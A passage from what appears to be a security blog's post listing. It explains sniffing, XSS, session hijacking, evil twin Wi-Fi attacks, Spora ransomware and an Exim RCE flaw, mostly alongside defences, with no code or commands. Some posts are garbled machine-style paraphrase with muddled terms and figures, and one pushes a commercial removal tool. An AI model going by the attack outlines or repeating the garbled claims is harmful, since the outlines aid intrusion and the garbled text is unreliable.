Threat actors can also use sniffing for stealing information from Syslog servers, Telnet service if it is being used in the network, a users' chat sessions, or other types of information that can be used to cause damage to a victim. If the information traversing over the network is unencrypted, then that makes it even easier for the attacker to find relevant information. Most of the attackers use software sniffing tools for stealing data, but if an attacker has more access to the target premises, then there are also hardware sniffers that they could use for this attack. Different approaches are used by adversaries to sniff a network. Some of those approaches are ARP sniffing, application-level sniffing, sniffing according to a protocol, web password sniffing, sniffing a LAN, and stealing a TCP session. Each of these approaches is used to steal different types of information from the victims. ARP sniffing is used for stealing IP and MAC addresses, application-level sniffing is used for stealing details about specific applications running on a target host, protocol sniffing is used to gather data related to one particular protocol only, web password sniffing is used to steal HTTP sessions that are then parsed for stealing victims' usernames and passwords, and LAN sniffing is used to gather details regarding internal hosts such as open ports. Attackers steal TCP sessions by sniffing all traffic flowing between a source and a destination Internet Protocol address and then using the stolen information to create fake TCP sessions that would fool the original source and destination hosts. So, these are some of the ways that a sniffing attack can take place and what the attackers use this type of attack for.

Sniffing is really hard to detect because attackers do not engage with the target host directly and only passively listen to the information flowing on a network. This makes this attack even more dangerous, and security controls should be put in place to prevent this attack from happening.

Read More

22

June, 2019

Securing IoT Using BlockChain

All terms like blockchain, safety, safe IoT information, cryptocurrency, etc. were heard by everybody. But the popularity of these techniques has increased and will remain a problem in the future. But how can IoT secure data help blockchain? ...
Blockchain has only been linked to cryptocurrencies previously. Blockchain technology is now used in many ways. It is also helpful for many other ways that the information spread throughout the chain (blockchain). In the case of the IoT or the Internet of Things, all devices can communicate without the need for human intervention.


We all know what Blockchain is by now.

Using blockchain only for crypto-currencies trading originally. It is useful as a directory in which individual members enter with other members approval. The information is stored throughout the chain in various blocks. It's not simple to build blocks in this directory. There is a lot of time and processing to make a single block. There is a reference in every block to the past entries and it forms a chain in this manner.

Though it is challenging to create a block — it is equally challenging to tamper with the information in a block.
A person or a business should manipulate all blocks so that they can enter a single block–which is nearly impossible. In the first location, the incredible technology involved in building the chain makes the information more secure and reliable. Another distinctive characteristic of blockchain technology is that no centralized information monitoring organization exists. The members handle the group's operations themselves. Keep away from a lotus control center makes blockchain information more reliable because no central agency can manipulate or corrupt anyone.

The problem with most data storage is that it is held on location in one place and easy for attackers to target.
If a hacker is able to violate a tiny location–all the information are available. Blockchain technology makes it almost impossible for anyone to violate and steal information in blocks across the chain. The system itself is made ideal for the secure storage of information by the logistics and company parameters.

Security Challenges In IoT

In the present IoT system, all the data gets authenticated centrally.
The information transmits safety and is regarded secure. The internet is accessible to all devices in an IoT setting. Every information piece is stored in comfortable cloud storage. Cloud storage can be changed or stolen by anyone. This access is a threat IoT is currently facing. Companies are vying with each other in supplying the maximum number of IoT devices.
In another ten years, the amount of such machines will be enormous. The hackers have more possibilities to access your information. Those unethical hackers can go in the system and reach the main data storage via any device. We witnessed an attack in 2016 that impacted nearly every IoT device. An extensive criminal assault was carried out by DDoS (distributed denial of service).With the distribution of IoT data, individuals knew that this safety lapse was serious. IoT is so widespread that almost all industries are affected. IoT produces a big number of information. Data from every patient's health are accessible for healthcare.

Consider a breach in the data storage of an insurance company.
The attackers can access millions of people's private data. The attackers can interrupt and retrieve the system by taking cash. The black hat hacker's danger is genuine and has always been. With unprotected devices, we have just facilitated hacking for them. Consider a situation where you can connect all equipment to your IT network. Hackers can join the instruments at the bottom of the scheme via the smallest.

Think about the information connected in your home or company.
You can access all of the data, including passwords, accounts etc. on your IT network. For an expert hacker it would be a child's game or even a low level hacker to introduce ransomware and prevent all equipment, in particular at one place.

How Can Blockchain Help In Securing IoT?

The blockchain is a decentralized scheme that helps solve IoT scalability, trustworthiness and data protection issues. The blockchain can allow trillions of devices to be tracked. Blockchain technology can contribute to the processing and coordination of transactions between distinct systems instruments. Data distribution and elimination of assaults at single points are helpful by the decentralized nature of the blockchain scheme.

The blockchain technology will make the ecosystem more secure and resistant to attacks. Under such an setting, consumer information will stay safer. In cryptocurrency transactions, the blockchain technique has also been proven. It implies that a core authority is unnecessary with peer-to-peer payment systems.IoT technology Blockchain enables us to communicate between device and people. Since the data are dispersed into the booklet, it can not be altered. In addition, the blockchain scheme keeps the history of intelligent machines. You can't in any manner modify it. Without a central control agency, smart devices can operate autonomously.

Any modern IoT application development company can use blockchain technology and create a dApp which will help in securing data.
The blockchain is a decentralized system that can help track the billions of devices.
It is possible to distribute data and protect from attacks.
You cannot alter data in a blockchain.
Blockchain allows you to use smart contracts to satisfy agreements before the exchange of messages.
This system allows IoT to maintain a ledger of all transactions.
Blockchain ensures the safety of data in IoT.

Challenges In Incorporating Blockchain in IoT

While it appears to be the best and easiest option for information securing in an IoT setting, it is far from ideal. The only consolation is that IoT itself is not fully established and that blockchain technology can thus easily be integrated into the scheme. The blockchain works effectively to protect information in a cryptocurrency directory, as it's just about moving the currency to another individual. Without the control of any central agency, Blockchain will assist in this process. But it may demonstrate more difficult to manage a network of appliances in various layers.

Conclusion

IoT is here to develop and expand. It is very obvious. However, the risk to information generated by the technology is also a truth. There are delicate information that could be attacked and robbed. This problem needs to be tackled. The blockchain is a technology with decentralized data storage which seems to be correct for the work.Another recommendation is for blockchain software developers to create the dApp and have the dApp continue the smart device control in the office and provide security against violations.dApp is a decentralized application type that is abbreviated. The dApp is operating on a decentralized peer-to-peer network with its backend code.

Read More

21

June, 2019

Preventing Cross-Site Scripting

The world is full of vulnerabilities, and hackers take advantage of those vulnerabilities to attack their target victims. It has been proven that human beings are the weakest link in the security chain because of reasons that are highly unavoidable by humans as they are a part of human nature, such as trusting someone, having emotions and things like that. ...
Apart from this, there are a lot of things in the world of security that require an explanation. There are a lot of security threats from which victims need to protect themselves. This blog talks about a specific type of cyber attack called cross-site scripting or XSS attack, and what security measures can be taken so that the attackers can be prevented from attacking their targets and the risk can be reduced considerably.

A cross-site scripting attack is an attack that takes advantage of a cross-site scripting vulnerability present in a web application to cause damage to the victims. Using a cross-site scripting attack, threat actors can perform various other malicious activities, such as stealing sensitive cookie data from a victims's computer system. There are three types of cross-site scripting attacks; namely, DOM-based XSS attack, reflective XSS attack, and stored XSS attack. All the three types of XSS attacks are different from each other in the way they are performed and the kind of cross-site scripting vulnerability they exploit. Among these, the most dangerous one is the stored XSS as it can be made persistent on a target server, whereas, the other two are not considered to be that important by attackers because they involve social engineering to be used to a certain degree for the whole attack to be successful.

Organisations can prevent cross-site scripting attacks from occurring by taking specific countermeasures related to the attack. One of the most critical steps that organisations should take is to either hire web developers who are well versed with programming skills and know how to write source code using secure coding techniques, or provide appropriate training to the already existing developers and help them learn techniques that would aid them in programming securely. Hiring skilled developers or providing training to the existing ones will help the organisation make sure that their website is being created using secure methods and that they are not vulnerable to a cross-site scripting vulnerability.

The developers who are responsible for creating and maintaining the website should make sure that there are no loopholes present in the site that could allow a cyber-criminal to hack into the website. One of the techniques that developers should use to prevent cross-site scripting is implementing appropriate input validation when taking inputs from users into any input field present on the website. What input validation does is that it checks a user input and sees whether inappropriate characters or strings have been entered as an input, such as a malicious computer script. After this, if there is any inappropriate input, then certain operations are performed on the input data according to some preset rules before letting the data pass onto a dynamically generated web page. The developers should also encode any output so that the web browser which the web application is being run on does not execute any malicious user-supplied content, such as a script injected by an adversary. Putting security measures in place would also protect the users of a web application from session hijacking attacks that leverage cross-site scripting attacks to steal sensitive session cookies. The HTTPOnly cookie flag must also be turned on for any sensitive cookies being used by the web application.

It is highly crucial for an organisation to put security controls in place and prevent cross-site scripting attacks because there can be lethal consequences of an XSS attack from which people need to be protected.

Read More

17

June, 2019

Cross-site scripting attack

Companies nowadays keep on creating various web applications for their customers to use. These web applications offer numerous types of services to users, such as online chatting, access to cloud resources, online banking, and so on. ...
When the users of these web applications provide happy feedbacks, then even the developers get delighted as they are the ones who created the web application. On reaching their milestones, developers and the companies they work for have parties and enjoy. But, what about the times when certain security vulnerabilities are discovered in their web applications. Well, no one likes to talk about those times. In this blog, one of the most dangerous web application vulnerabilities have been discussed and how it can be taken advantage of by hackers to attack their target victims. The vulnerability we are talking about is the cross-site scripting web application vulnerability. Attackers can use this vulnerability to perform a cross-site scripting (XSS) attack and cause severe damage to their victims. They can steal sensitive information, or they could perform other malicious activities through this attack, and the more people visit a website that is vulnerable to cross-site scripting, the worse is the impact.

Web applications are built using various programming languages, which are used to create different parts of the web application, such as the frontend, the backend, the database, and so on. It is up to the owner of the web application to choose which programming and database languages to use. Many of the programming languages themselves have vulnerabilities that make them unsuitable to be used for the development of a web application, and yet they are used in today's world to create web applications that are used by hundreds of thousands of web users for accomplishing a large number of tasks. Apart from vulnerabilities being present in the programming languages being used, many vulnerabilities get created in a web application when the developers do not use correct programming techniques to code the application. If the developers do not use secure programming techniques, then there is an increased risk of there being exploitable vulnerabilities, such as the cross-site scripting vulnerability, present in the web application. An XSS vulnerability is one in which threat actors harness the power of computer programming scripts to make alterations in a web application and cause damage either to the web application, the user using the web application, or both. Whichever the case, the impact is definitely felt by the owner of the web application as well. Adversaries use their programming and hacking skills to create malicious scripts and inject them into a website that is vulnerable to an XSS attack. The computer scripts could be written in either of the various client-side languages present in the world.

Attackers start by testing their chosen target web applications to first see whether they are even vulnerable to the attack. One way to do this is to check whether a web server is replying to a web request containing a script with a response that a web browser can execute, and if this test is successful, then the attackers get to know that the web application is vulnerable to cross-site scripting. After this, the attackers decide on what type of XSS attack do they want to use. Basically, there are three main types of XSS attacks, namely, stored XSS, reflective XSS and DOM-based XSS, and among these, the most severe one is the stored XSS attack.

In a stored XSS attack, attackers exploit the XSS vulnerability present in a web application by injecting a malicious script into a particular part of the web application so that the script gets stored permanently on the server. An example would be inserting the script in the form of a hyperlink in the comments section on a website by posting an actual comment, which would be visible to everyone visiting that website. After getting the server to store their malicious script, the attackers wait for a victim to go ahead and click on the hyperlink, which then executes the script and the malicious actions that the attacker wanted to happen start occurring. In reflective XSS, the attacker usually fools a victim into navigating to a dangerous URL through which the attacker manages to inject scripts into a dynamically generated web page, such as a search results page, and get full access to whatever is present on that web page. In a DOM-based XSS, attackers take advantage of the issues in the client-side script. One of the ways this attack works is that when attackers inject extra client-side scripts along with the data that is written by an already existing client-side script onto a web page after using the information present in a particular URL request parameter, the additional malicious script that is included by the attackers also gets executed. This is possible if the information is not encoded using HTML entities. An example of this could be when a user clicks on a link on a malicious website to a page that is vulnerable to DOM-based XSS, then an attacker could include malicious code along with the URL request, which would get executed when the data would be interpreted by the web browser of the victim. Reflective and DOM-based XSS usually involve some degree of social engineering; therefore, they are not considered to be of that much use to cyber-criminals.

So, these are some of the ways an XSS attack can be performed by adversaries. This attack can cause significant damage to its victims, and hence, measures should be taken by web application owners and developers to mitigate the risk of any casualties.

Read More

15

June, 2019

Spora Ransomeware

Spora was first found on 10 January 2017, a ransomware-type virus. Malware utilizes a advanced AES and RSA encryption key combination to corrupt computer user data. ...
The virus activity has been reduced for a few months, despite its stunning appearance and worldwide prevalence. In August, however, researchers warned of the return of ransomware.

Spora ransomware is a CryLocker-derived data-encryption Trojan. Malware only began to communicate in the Russian language with its victims. It started traveling all over the world, however, after several weeks of operation. Mexico, Poland and Sweden are currently the most affected countries.It is performed using the close.js file. Files from JavaScript are popular hacker tools. Surprisingly, a completely different and very complicated data encryption algorithm that seems immune to the malicious program.

Spora virus apparently creates. KEY file contents by creating RSA key, and encrypts them with the AES software newly generated. Furthermore, it encrypts the AES key using the public key in the executable file of the virus and saves it to. KEY.Data encryption routine for this malware is somewhat less complicated, because they are encrypted with an AES key encrypted by the RSA cipher.The Javascript file extracts a random name executable and executes it. The executable then begins to encrypt files with RSA encryption. Note that Spora does not rename encrypted files, unlike other viruses of ransomware type.A DOCX file is also removed from the above-mentioned HTA file. This file is corrupt and an error appears once opened. This error will appear. This is done to make the victims believe email attachment downloads have failed.The ability to work offline (without an Internet connection) is one of Spora's major advantages to the developers. The files are encrypted, as mentioned above, by using RSA and are generated during encryption by public (encryption) as well as private keys (decryption). It is not possible to decrypt without a private key.The private key is also encrypted with AES cryptography, which aggravates the situation. Spora deactivates Windows Startup Repair, removes copies of shadow volumes and changes BootStatusPolicy as well as crypting files.The HTML file contains a ransom request message in Russian that details the encryption and encourages victims to follow the Spora website instructions. Victims must pay a ransom for the restoration of files. The ransom size depends on the situation and requirements of the victim.

Full decryption is approximately equivalent to between $ 79, including immunity, removal, and restore of files, but victims may only choose to restore, remove or receive Immunity.The price is reduced in such cases. Victims are also allowed free of charge to decrypt two files.The restitution must be paid in bitcoins and the victims have a limited time (a time limit is given for payment on the Spora website). Compared to other viruses of the same type, Spora's website is advanced.


Ransomeware That Works Offline -Meet Spora Here:

For the encryption process Spora uses a mixture of Symmetric(AES) and Asymmetric(RSA).Windows CryptoAPI is used to support encryption on the system.Only after you hit Spora Ransomware, the malware creator's public RSA key inserted into your malware executable will be detected and decoded using a hard-coded AES key.Once the public RSA key is effectively imported from the malware creator, the malware makes another 1024 RSA key pair, which we will call the RSA key pair for the victim, which consists of both a private and public key.A new 256-bit AES key for encrypting the private RSA key of the victim will also be genered. Once the private RSA key of the victory is encoded, the used AES key is encoded using the public RSA key of the malware creator.The encrypted key material and certain additional data are then stored within the .KEY file.Spora will create a new AES 256bit per-file key to encrypt a record or document on the system. This file key is used to encrypt the document's first 5 MB. After the malware has done so, the file key with the public RSA key is encrypted and the encrypted document is attached with the RSA coded per-file key.

Spora is composed of C and packed with an executable UPX packer. Not like most ransomware families, Spora does not rename records it codes, therefore there are no specific document extensions related to it.A HTML-based ransom note and a. KEY file are displayed while a system is affected. In the client ID that ransomware assigns to each customer the basic name of the two documents is indistinguishable. The note Ransom is in the Russian language:A few things were quickly taken into account: Firstly, it's an excellent look for the presentation and the user interface. And the payment requested by them seemed relatively short, not at all like other ransomware.Spora focuses mainly on Russian customers by providing messages about the 1C receipt, a popular accounting program in Russia and many countries in the U.S.S.


How To Remove Spora Ransomeware From Your PC:

Manual removal of threats could be a long and complicated process requiring advanced computer skills. Spyhunter is a tool for the professional automated deletion of Spora virus. Click the button below to download it: Users for Windows XP and Windows 7: Start your Safe Mode computer. Click Start, Shut Down, Restart, OK. Click Restart. Press the F8 key on your keyboard multiple times during your computer start process until you see the Windows Advanced Option menu and then choose Network Safe mode from the list.

Users of Windows 8: Start Windows 8 is Networking Safe Mode-Select Settings in a search result, go to Windows 8 Start Screen, type Advanced. Choose Advanced startup options, select Advanced startup under the opened "General PC Settings" window. Click on the button "Start now."The "Advanced Startup Options Menu" will now start your computer again. Press the button ' Troubleshoot, ' then click the button ' advanced options. 'Click "Startup Settings" on the advanced option screen. Click on the button "Restart." In the Startup Settings screen your PC restarts. To boot with networking in safe mode, press F5.

Windows 10 users: Click the Windows logo and choose the Power icon. Click "Restart" in the opened menu while holding the button "Shift" on your keyboard. Click the "Shooting troubleshoot," select "Advanced options" in the "Shooting option" window. Select "Start Settings" from the advanced options menu and click on "Restart." Click "F5" on your keyboard in the following window. This restarts your operating system with networking in secure mode.

Read More

15

June, 2019

Please don't hijack my session

Cyber-criminals come up with new tricks and techniques to steal sensitive information from their victims and cause a massive amount of damage to them. There are a lot of cyber-attacks that threat actors could take advantage of to attack their victims. ...
One such attack is a session hijacking attack using which attackers can steal sensitive information from the victims. This blog talks about what a session hijacking attack is and what security controls can be put in place to prevent this type of attack and protect the victims from suffering massive losses.

A session is like a meeting in which information exchange takes place between two parties for a certain period of time. Web servers use several pieces of information to keep track of the visitors to a website hosted on those web servers. One of the most commonly used methods is using cookies. Cookies are pieces of information that are stored by a website on a user’s computer system to help the site keep track of the user. The cookies provide the advantage to the website of not having to acquire the information about a client again and again. The information is read by the site from the cookies stored on the user's computer. A sensitive type of cookie, which tempts cyber-criminals the most is the session cookie. A session cookie is used by a website to store information about a user's session. Till the time the user's session is valid, the cookie also remains valid, and hence, can be used to hijack a user's session. Threat actors can use a session hijacking attack to steal a sensitive session cookie, such as the one set by a banking website when a user logs in into their online banking account. Adversaries can also take advantage of multiple different types of attacks, such as cross site scripting, session sniffing and other types of man-in-the-middle attacks, to perform session hijacking.

It is highly necessary to protect victims against session hijacking attacks because the impact that this attack can have on its targets is considered to be very high. To begin with, the owners of the website need to start making sure that the developers who develop their websites use secure coding techniques to write the code that makes up the websites. This will help ensure that the vulnerabilities that arise due to the source code and the implementation of the various functions that are used in the code are reduced. Another thing that should be done is using secure methods when transferring sensitive cookies to the client machine and also when storing them on the client computer. As most of the session hijacking attacks involve stealing session cookies while they are being sent by the web server to the client, or stealing the session cookie while they are stored on a victim's computer system, there is a need to implement methods that can prevent attackers from using both the aforesaid techniques to steal session cookies. Website developers should also try to implement security controls that help them prevent other types of cyber-attacks that could lead to a session hijacking attack. They could use controls to prevent cross site scripting attacks, session prediction attacks, session sniffing attacks, etc. on their website.

Users should always log out of their online accounts if the computer that they are using is shared among different users as you never know what type of websites the other users may be visiting, and they could just cause the computer to get infected, which in turn, could also lead to the theft of session cookies. When a user signs out of their account, the current session cookie gets invalidated, and hence, cannot be used to hijack a user's session. Users should also try to use secure communication channels, such as the ones using SSL or TLS, or they could use Virtual Private Networks (VPNs) to help them encrypt their network connections.

Session hijacking is a type of attack that can occur directly or be the result of another cyber-attack, and the fact that there can be severe consequences of this attack should make it one of the priority cyber-attacks from which website owners should protect their websites and its users.

Read More

14

June, 2019

Email attacks

There was a time when people did not have the means to communicate with the people living in far off places. People could not talk to their loved ones who lived far away from them. Then, someone came up with the idea of using pigeons or other people to send messages written on paper or a piece of cloth. ...
Surprisingly enough, at that time, even the pigeons used to reach the recipient with the message safe and sound. Over the years, people developed more new methods to communicate what they wanted to say to other people. The telephone was developed for verbal communication, and postal delivery systems were created to deliver the physical mail sent by one person to the other. The postal delivery systems took a lot of time to deliver the mail back then (they still do), so many professionals started thinking of new ways to send written messages that could be delivered in the least time possible. When computers were invented, one great person came up with the idea of emails, which is an electronic mail delivery system used to deliver digital mail. Emails are still used today, and the technology has gone under several advancements. However, with the progress of email technology, threat actors have also become smarter, and have found ways to hack people’s email accounts and steal the information that is shared in the emails that people send or receive. This blog discusses how emailing systems are vulnerable to getting hacked by cyber-criminals and what impact email attacks could have on the victims.

Emails are used by people to share several different types of information. From family photographs and greeting cards to sensitive information, such as online account credentials, information is shared to and fro across the internet using emails as the mode of communication. As emails are vastly utilised, therefore, they are a hot target for threat actors. Attackers can use several different types of cyber-attacks to steal information from emails. They can even hack into a user's email account and send bogus emails to the victim's contacts or other people. They could create chaos by hacking into just a single email account. Many email service providers do not use encryption to protect their customers’ email messages from being read by unauthorised parties, and among those who do use encryption, there are cases where the encryption techniques used are not implemented correctly, which makes email messages vulnerable to be read by cyber-criminals by using certain types of cyber-attack. An adversary could use sniffing attacks to sniff the email traffic off of a network and read the information present in the emails.

Let us consider this example. Imagine you have just opened a new bank account with this new bank that has only recently come into existence. You went to your nearest branch, and while opening the account, you deposited some money into it. After completing all the formalities, they tell you that you can also access your banking details online via the bank's website by using your credentials, which the bank will send you after 24 hours. Now, you come home in the evening, have dinner, and go to bed. The next day, you check your email, and you see an email from the bank, but you notice that it has already been opened. You check what is inside and find that the email contains your user credentials for the bank's website just as the bank told you. You use those credentials to login into your online banking account only find that all the money that you had deposited into your new bank account was gone. It had been transferred to a foreign bank account using the online money transfer service of the bank. You report to the police, and after a while, it was found that someone was using a packet sniffer on your network to sniff all the network traffic, and they sniffed off the contents of the email when it was being downloaded to your laptop on which you had signed into your email account and had not signed out. This was possible for the attacker as neither your email service provider and nor did the bank's email service provider use any encryption techniques to safeguard the contents of the email. All this cost you your hard earned money, and there is no way to recover it back.

Hackers could also use attacks on the email servers themselves and compromise them to steal information. There could also be cases when threat actors compromise several email accounts and use those email accounts to send out spam emails to everyone across the internet. Spam emails tend to fill up victims' email storage, and this could cause victims to miss their important email messages, such as those being from their bank informing them about an unauthorised transaction and other important stuff.

Emails have become an integral part of people’s everyday lives as almost everyone on this planet uses them to send and receive important information. Therefore, there is a considerable need to prevent email attacks and save people's and organisations’ sensitive information from being stolen by cyber-criminals.

Read More

14

June, 2019

Session hijacking attack

Have you ever tried snatching the phone from a friend of yours while they were talking to someone else, and then started talking to the person on the phone yourself? Well, a lot of you might have done it, and some of you might have not. ...
This blog talks about a certain cyber-attack, which behaves in a similar way but without anybody noticing, and is used by hackers for purposes that are not considered to be good. The type of cyber-attack that is being talked about is a session hijacking attack.

A session is a collection of exchanges that a user makes with a dynamic website or a web application during a specific interval of time. A session is used by websites so that they can store information regarding the client that can be used on different pages of the website without having to obtain that information again and again. A session can be compared to a meeting in which two parties exchange information with each other till the meeting is being held, and when the meeting ends, they stop exchanging the information. The validity of a session can be controlled automatically by the web server according to a set time limit, or the user who is visiting a specific website can manually end the session by logging out of the website.

Threat actors can use a session hijacking attack to steal sensitive information from targets. The confidential information mostly includes session cookies, which are set by a website on a user's computer system. The fact that these cookies are transmitted over the network from the server to the client makes them vulnerable to be stolen by attackers. Hackers can also steal these cookies while they are stored on a user's computer. Threat actors can use various types of techniques to perform a session hijacking attack. They could also take advantage of other types of cyber-attacks to steal session cookies, or they could take advantage of the vulnerabilities present in the website for this particular purpose.

One such cyber-attack that threat actors could use as an initial stage for a session hijacking attack is a cross site scripting attack. The threat actors can create special scripts that they could embed in a webpage that is frequently visited by users. An example of this could be the comments section present on a website, in which the attackers can embed the malicious script in the form of a comment. They can insert a link into a comment, which when clicked upon by unsuspecting users would execute the script, which in this case would be a script that would help the attackers steal the victim’s session cookie. The attackers could then use the session cookie to hijack the victim’s session.

In another type of session hijacking attack, the adversary could use a proxy tool like Burp Suite to intercept web requests and responses that are exchanged between the client and the server. When the user logs in into their account, the web server responds back with a session cookie. Now, if that session cookie is not adequately secured, then the threat actor would be easily able to intercept it using Burp Suite. After intercepting the unsecured session cookie, the attacker could then inject that session cookie into a web URL or an HTTP request and manage to hijack an authenticated user’s web session. The attacker will get access to the victim’s authenticated session, and in turn, their online account. After getting this access, the attacker could use it for other malicious purposes, such as manipulating other people by posing as the owner of the account or by doing something else that may cause damage to the victim whose online session the attacker has hijacked or to others.

Session hijacking is a very nasty problem to deal with because of the impact it can have on the victims of this type of cyber-attack. Organisations should take proper care when developing their websites and should take care that sensitive information like session cookies remain secured.

Read More

8

June, 2019

Protecting against Evil Twin attacks

Wireless access points are used in homes, offices, hospitals, educational institutions, hotels, airports, and several other places. Threat actors use the flaws present in these access points for their advantage by performing attacks that involve these access points. ...
he attack that we will be discussing in this blog is the Evil Twin attack and the measures that can be taken to prevent this type of attack.

The Evil Twin attack is a wireless attack which involves the creation of a fake access point by the threat actors, which has precisely the same configuration as another legitimate access point in an intent to steal the sensitive information of the users whose devices are connected to the legitimate access point. The cyber-criminals use various sets of tools to set up a rogue access point to which they get the target client devices to connect to and then use network traffic sniffing and interception tools to steal the sensitive information of the victim users, such as account usernames and passwords. The hackers can cause an enormous amount of damage using an Evil Twin attack.

Let us take the example of a hostel on a very busy day in the holiday season. There are several thousands of people who visit hotels while on vacation at their favourite holiday destinations. While sitting in the lounges, the hotel restaurant or while in their rooms, most of the people tend to use the hotel WiFi to access the internet so that they can either perform some of their business tasks, check their emails or just so they can watch something entertaining. Now, imagine if a threat actor somehow manages to create an Evil Twin of the hotel’s wireless access point that is located on one the floors of the hotel, and chooses to attack the users whose devices are connected to that access point. Let’s say one of the victims needs to access their online bank account. They use their laptop, which is supposedly connected to the rogue access point created by the adversary. The attacker would then and there steal the victim’s credentials and use those credentials to steal money from the victim’s bank account. There would be so many people in that hotel who would either be making online transactions or accessing some or the other type of sensitive information, and the attacker could easily and happily steal all that information all day long, and no one would even notice as it is so busy at the hotel. The Evil Twin attack could turn out to be very evil, indeed. However, one should not go down without a fight.

Some security measures can be taken to help protect victims from an Evil Twin attack. One of the measures could be taken by the creators of the websites that people visit. The owners of the sites should make sure that their website uses Highly Strict Transport Security (HSTS), which is a security mechanism that prevents people from accessing a particular website if the connection between the client browser and the site is not secure. This would be very useful when, for example, the victim of an Evil Twin attack unknowingly browses to a website over a non-SSL connection. If the site to which they navigate to uses HSTS, then the website would not allow the victim to have access to it and would generate an error. This would help in the cases when an attacker uses specific tools to strip off the SSL layer from the connection created between the client browser and the website.

A precaution that people could take is to use their mobile network connection for accessing the internet whenever they can. This reduces the risk of a cyber-criminal creating an Evil Twin of an access point altogether. This precaution can be helpful when visiting public places. To add to the security of the connection to a website, a Virtual Private Network (VPN) could be used. This would make it more difficult for the adversary to decrypt the network traffic being transmitted over the established connection. Another measure that could be taken against this attack is to make the SSID or the broadcast name of the legitimate wireless network hidden, and only telling it to the people you know and who want to connect to the network. This would help protect against the attacks by not displaying the network on the list of the attacker when they scan for the available networks around them.

Evil Twin attacks are easy to perform but are not so easy to detect. Therefore, a lot of care is necessary to defend against this attack and protect potential victims.

Read More

7

June, 2019

RCE Vulnerability:

Remote code execution is the capacity of an attacker to access and make adjustments to another devi irrespective of the location of the device....
Vulnerabilities may enable an attacker, using the privileges of running the applications, to perform malicious code and control the entire system. After the system has been accessed, attackers often try to increase their rights.

It's best to solve a hole that allows an attacker to get access to a laptop from the distant code running vulnerability. In its monthly patch Tuesday fixes, Microsoft frequently publishes safety patches that address remote code execution vulnerabilities.

Usually the developer of the web application does not want this conduct. Remote Code Assessments can make the vulnerable web application and the Web server thoroughly compromised. Nearly every programming language has code assessment features. It is essential to note.RCE enables an attacker, through arbitrary malicious software (malware), to take over a computer or server. "RCE vulnerabilities, as attackers can run malicious code on vulnerable servers, are one of the most dangerous of all kinds,"

One instance of vulnerability in remote code implementation is the CvE-2018-8248 vulnerability–one of Microsoft's June 12th safety update safety vulnerabilities. A malware-related attacker on sensitive computers is allowed with the vulnerability CVE-2018-8248, also known as the "Remote Code Effect Vulnerability Microsoft Excel" vulnerability.

New RCE vulnerability impacts nearly half of the internet's email servers:

Exim, an MTA, is a software that operates on email servers to relay messages from senders to recipient, which is affected by the vulnerability.According to a study in June 2019 of all e-mail Servers visible on the Internet, the amount of Exim's facilities would rise 10 times by 5.4 million, which is 57% (507.389) of all email Servers. Qualys, a cyber security company specializing in cloud safety and compliance, said a safety alert with ZDNet previously today that Exim installations with 4.87 to 4.91 facilities had a very hazardous vulnerability.

Qualys said that a local assailant with an e-mail server presence, even with a low-privilege account, can immediately take advantage of the vulnerability. However, the true risk lies in remote hackers who are able to scan the web on sensitive server and take over systems. However, we cannot ensure that this exploitation technique is unique because of the very complexity of Exim's code ; there may be quicker techniques. The Exim 4.92 release patched the vulnerabilities on February 10, 2019, but they didn't realize they solved a large security hole at the moment the Exim team published 4.92. That was found only lately by the Qualys team when the old Exim versions were audited. Now, scientists at Qualys warn Exim users to update to version 4.92 in order to prevent attackers taking over their servers. Only 4.34 percent of all Exim servers operate the recent release on 4.92 in the same June 2019 market share report on the email server.

Prevention:

For example, Microsoft Security Update 12 June 2018 must be mounted to avoid remote code implementation by using CVE-2018-8248 vulnerabilities. If Microsoft's March 2017 safety update was used on time only, remote code execution could have been avoided in the event of WannaCry Cyberattack by exploiting Microsoft Windows SMB vulnerability.The original attack must be blocked in order to avoid attackers attempting to infect sensitive servers using cryptocurrency mining malware. Initially, cyber criminals typically exploit vulnerabilities to remote code execution to start malware, like WannaCry assailants did.As a rule, your business must collect, evaluate and act on the latest information regarding threats to considerably minimize danger. The best tool for applying patches must be provided to your IT team, thereby alleviating the danger of a violation of information. In order to avoid remote code implementation and other cyber-attacks, workstation and server patching can and should be automated more easily.

Read More

7

June, 2019

Evil twin attack

Wireless technologies have made mobile computing a breeze because it has enabled people to perform their tasks from anywhere they want. Be it the library, a subway station, a restaurant, or an airport, wireless networks ...
have made their presence felt by helping people access the internet from wherever they want. People use wireless technologies for doing their work, but on the other hand, threat actors use these technologies for performing malicious activities. This blog discusses a specific type of cyber-attack, called the Evil Twin attack, which can be used by cyber-criminals to attack victims using wireless access points.

An Evil Twin attack is a type of cyber-attack that mainly takes advantage of the weaknesses in wireless access points. The main concept behind an Evil Twin attack is to set up a wireless access point that is precisely similar to an already existing one located at a place which the cyber-criminals want to target. By targeting a wireless access point, what threat actors really want to do is make the client devices, which connect to that access point as their primary targets through which they intend to steal the sensitive information of the users using those devices. The attackers create a rogue access point with the same configuration as the target access point, such as the SSID or the name of the wireless network that is broadcasted to all the client devices, the MAC address of the access point and even the channel number on which the target access point is operating on. There are multiple ways in which Evil Twin attacks can be performed, and there are a lot of tools that can be used to attack a wireless access point. There are tools like Wifite and the Aircrack-ng suite that are very easy to use and are a part of every hacker's toolkit.

Going into the details of the Evil Twin attack, the attacker first has to set up their rogue access point appropriately so that it can handle the clients that would be connecting to it and also the network traffic that would be flowing through it. To do this, the adversaries simply have to set up a Dynamic Host Configuration Protocol (DHCP) server on their rogue access point so that the victim devices that would be connecting to it can obtain an IP address for accessing the network services. In addition to this, for the proper routing of the network traffic through the rogue access point to and from the client devices, the firewall rules on the evil access point also have to be set by the attackers. Finally, the attackers set the name of the access point or the SSID to be the same as of the target access point. After the setting up of the rogue access point is completed, the attackers first use the Airmon-ng tool, which is a part of the Aircrack-ng suite to enable monitor mode on one of the interfaces of the rogue access point so that they can detect what all client devices are currently connected to their target access point. After turning on the monitor mode, the attackers try to deauthenticate the chosen client device from the target access point using another tool. They do this repeatedly until the client device finally gets connected to the rogue access point created by the adversaries. After the target client device gets connected to the fake access point, it gets an IP address and starts accessing the network through the phoney access point.

